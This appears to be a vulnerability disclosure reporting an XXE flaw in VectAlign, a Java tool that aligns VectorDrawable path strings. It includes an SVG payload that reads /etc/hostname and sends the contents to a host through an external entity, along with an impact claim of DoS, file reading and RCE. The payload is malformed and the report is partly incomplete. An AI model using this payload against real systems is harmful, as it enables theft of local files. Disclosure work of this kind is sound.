vulnerability xxe
severity 7.3
language java
registry other


VectAlign (a.k.a. VectorDrawableAlign) is a developer's tool which automagically aligns two VectorDrawable "pathData" strings (or SVG images) in order to allow morphing animations between them using an AnimatedVectorDrawable. this package is vulnerable to (XXE).

:recycle: Steps To Reproduce-:

  1. download and run
  2. creat a payload svg or use : (this is a example of External Xml Inclusion )

the example dd.svg looks like :

<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://localhost:8080/d.xml">
<svg viewBox="0 0 200 200" version="1.2" xmlns="" style="fill:red">
      <text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
      <rect x="0" y="0" rx="10" ry="10" width="200" height="200" style="fill:pink;opacity:0.7"/>
      <flowRoot font-size="15">
           <rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/>


<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://localhost:8080/s.l?=%data;'>">

:male_detective: POC


💥 Impact

DOS or Denial of service LFI or local file inclusion (as in the POC) RCE